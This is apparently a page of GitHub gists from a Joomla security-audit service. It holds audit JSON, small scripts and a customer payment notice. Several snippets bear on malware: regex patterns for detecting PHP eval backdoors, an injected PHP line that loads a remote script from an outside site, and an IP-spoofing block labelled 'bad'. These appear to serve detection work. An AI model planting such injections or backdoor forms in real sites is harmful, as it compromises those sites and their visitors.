Phil E. Taylor PhilETaylor

## gist:4054005
{
	"data":
	[
		{
			"id": 690,
			"site_id": 11122681,
			"user_id": 12364,
			"status": "BLOB",
			"killflag": null,
			"scanerrormsg": null,

## example.php
<?php
$data = array(
    "id" => 155, // Our internal id number for the audit
    "site_id" => 123,                             // Your sites ID reference
    "user_id" => 456,                             // Your User ID reference
    "status" => "COMPLETE",                       // Used during audit progress - shows status of the audit
    "killflag" => null,                           // Used during audit progress - allows us to kill an audit
    "scanerrormsg" => null,                       // Used during audit progress - Any error your site gives us
    "step" => "",                                 // Used during audit progress - What step of the audit we are on
    "version" => "2.5.7",                         // Your exact Joomla version identified

## gist:5984738
function setcookie7(e, d, c) {
    var b = new Date();
    var a = new Date();
    if (c == null || c == 0) {
        c = 1
    }
    a.setTime(b.getTime() + 3600000 * 24 * c);
    document.cookie = e + "=" + escape(d) + ";expires=" + a.toGMTString() + ";path=/"
}
function trytocheck() {

## content
  if (!is_string(@$json->version)) {
                    $json->version = '';
                }

## removebtn

<script>
    jQuery(document).ready(function(){
        jQuery('#submitBtn').click(function(e){
            jQuery(this).remove();
        });
    });
</script>

## match.regex
<\?php\s*eval\(base64_decode\(\$_POST\['[a-zA-Z0-9]{7}'\]\)\)\;\?>|<\?php\s*\$sF="PCT4BA6ODSE_";\$s21=strtolower\(\$sF\[4\]\.\$sF\[5\]\.\$sF\[9\]\.\$sF\[10\]\.\$sF\[6\]\.\$sF\[3\]\.\$sF\[11\]\.\$sF\[8\]\.\$sF\[10\]\.\$sF\[1\]\.\$sF\[7\]\.\$sF\[8\]\.\$sF\[10\]\);\$s20=strtoupper\(\$sF\[11\]\.\$sF\[0\]\.\$sF\[7\]\.\$sF\[9\]\.\$sF\[2\]\);if\s\(isset\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\)\)\s\{eval\(\$s21\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\)\);\}\?>|<\?php\s*\$qV=\"stop_\";\$s20=strtoupper\(\$qV\[4\].\$qV\[3\].\$qV\[2\].\$qV\[0\].\$qV\[1\]\);if\(isset\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\)\)\{eval\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\);\}\?>


<\?php\s+\$.{4,6}\s=\s\".{4,32}\";\sif\(isset\(\$_REQUEST\[\'.{4,10}\'\]\)\)\s{\s\$.{4,10}\s=\s\$\_REQUEST\[\'.{4,10}\'\];\seval\(\$.{4,10}\);\sexit\(\);\s\}\s+if\(isset\(\$_REQUEST\[\'.{4,10}\'\]\)\)\s\{\s\$.{4,10}\s=\s\$_REQUEST\[\'.{4,10}\'\];\s\$.{4,10}\s=\s\$_REQUEST\[\'.{4,10}\'\];\s\$.{4,10}\s=\sfopen\(\$.{4,10},\s\'w\'\);\s\$.{4,10}\s=\sfwrite\(\$.{4,10},\s\$.{4,10}\);\sfclose\(\

## gist:5347fb3d1dada1fcf361
<?

$TheUsersToken = '.....';

$http = new Zend_Http_Client('https://api.pushbullet.com/v2/pushes');
$http->setHeaders('Authorization', 'Bearer ' . $TheUsersToken);
$http->setParameterPost('type', 'note');
$http->setParameterPost('title', 'Someone logged in as you at myJoomla.com');
$http->setParameterPost('body', 'blah blah blah');
$res = $http->request('POST');

## bad
if(isset($_SERVER))
{
	$_SERVER['PHP_SELF'] = "/";
	$_SERVER['REMOTE_ADDR'] = "127.0.0.1";
	if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
	{
		$_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
	}
}

## gist:65285a43cdc24e8d679e
Hi there Greek friends

Thanks for being a myJoomla.com subscriber.

I have been following the situation in Greece in the news, and have personal friends and word acquaintances in the country.

I understand things are difficult for Greek nationals and companies right now and that its impossible for you to pay bills outside of Greece with credit cards etc… several of you have already been in touch and others have already had failed payments.

I am currently “forgiving” any failed payments by Greek users, and so if your renewal payment fails - for the reason that the Government still has national control over out of country money sending - we will make that invoice as paid/closed/ignored/forgiven and you can continue to use myJoomla.com as if you had paid

## gist:afc67aaa2d3396e06ad2
<?php
#345c77#
if(empty($gsjh)) {$gsjh = "<script type=\"text/javascript\" src=\"http://futureinsiterealty.com/wp-content/themes/realty/l9cdj72f.php?id=1440511\"></script>";echo $gsjh;}
#/345c77#
?>
	{
	"data":
	[
	{
	"id": 690,
	"site_id": 11122681,
	"user_id": 12364,
	"status": "BLOB",
	"killflag": null,
	"scanerrormsg": null,
	<?php
	$data = array(
	"id" => 155, // Our internal id number for the audit
	"site_id" => 123, // Your sites ID reference
	"user_id" => 456, // Your User ID reference
	"status" => "COMPLETE", // Used during audit progress - shows status of the audit
	"killflag" => null, // Used during audit progress - allows us to kill an audit
	"scanerrormsg" => null, // Used during audit progress - Any error your site gives us
	"step" => "", // Used during audit progress - What step of the audit we are on
	"version" => "2.5.7", // Your exact Joomla version identified
	function setcookie7(e, d, c) {
	var b = new Date();
	var a = new Date();
	if (c == null \|\| c == 0) {
	c = 1
	}
	a.setTime(b.getTime() + 3600000 * 24 * c);
	document.cookie = e + "=" + escape(d) + ";expires=" + a.toGMTString() + ";path=/"
	}
	function trytocheck() {

	<script>
	jQuery(document).ready(function(){
	jQuery('#submitBtn').click(function(e){
	jQuery(this).remove();
	});
	});
	</script>
	<\?php\seval\(base64_decode\(\$_POST\['[a-zA-Z0-9]{7}'\]\)\)\;\?>\|<\?php\s\$sF="PCT4BA6ODSE_";\$s21=strtolower\(\$sF\[4\]\.\$sF\[5\]\.\$sF\[9\]\.\$sF\[10\]\.\$sF\[6\]\.\$sF\[3\]\.\$sF\[11\]\.\$sF\[8\]\.\$sF\[10\]\.\$sF\[1\]\.\$sF\[7\]\.\$sF\[8\]\.\$sF\[10\]\);\$s20=strtoupper\(\$sF\[11\]\.\$sF\[0\]\.\$sF\[7\]\.\$sF\[9\]\.\$sF\[2\]\);if\s\(isset\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\)\)\s\{eval\(\$s21\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\)\);\}\?>\|<\?php\s*\$qV=\"stop_\";\$s20=strtoupper\(\$qV\[4\].\$qV\[3\].\$qV\[2\].\$qV\[0\].\$qV\[1\]\);if\(isset\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\)\)\{eval\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\);\}\?>


	<\?php\s+\$.{4,6}\s=\s\".{4,32}\";\sif\(isset\(\$_REQUEST\[\'.{4,10}\'\]\)\)\s{\s\$.{4,10}\s=\s\$\_REQUEST\[\'.{4,10}\'\];\seval\(\$.{4,10}\);\sexit\(\);\s\}\s+if\(isset\(\$_REQUEST\[\'.{4,10}\'\]\)\)\s\{\s\$.{4,10}\s=\s\$_REQUEST\[\'.{4,10}\'\];\s\$.{4,10}\s=\s\$_REQUEST\[\'.{4,10}\'\];\s\$.{4,10}\s=\sfopen\(\$.{4,10},\s\'w\'\);\s\$.{4,10}\s=\sfwrite\(\$.{4,10},\s\$.{4,10}\);\sfclose\(\
	<?

	$TheUsersToken = '.....';

	$http = new Zend_Http_Client('https://api.pushbullet.com/v2/pushes');
	$http->setHeaders('Authorization', 'Bearer ' . $TheUsersToken);
	$http->setParameterPost('type', 'note');
	$http->setParameterPost('title', 'Someone logged in as you at myJoomla.com');
	$http->setParameterPost('body', 'blah blah blah');
	$res = $http->request('POST');
	if(isset($_SERVER))
	{
	$_SERVER['PHP_SELF'] = "/";
	$_SERVER['REMOTE_ADDR'] = "127.0.0.1";
	if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
	{
	$_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
	}
	}
	Hi there Greek friends

	Thanks for being a myJoomla.com subscriber.

	I have been following the situation in Greece in the news, and have personal friends and word acquaintances in the country.

	I understand things are difficult for Greek nationals and companies right now and that its impossible for you to pay bills outside of Greece with credit cards etc… several of you have already been in touch and others have already had failed payments.

	I am currently “forgiving” any failed payments by Greek users, and so if your renewal payment fails - for the reason that the Government still has national control over out of country money sending - we will make that invoice as paid/closed/ignored/forgiven and you can continue to use myJoomla.com as if you had paid
	<?php
	#345c77#
	if(empty($gsjh)) {$gsjh = "<script type=\"text/javascript\" src=\"http://futureinsiterealty.com/wp-content/themes/realty/l9cdj72f.php?id=1440511\"></script>";echo $gsjh;}
	#/345c77#
	?>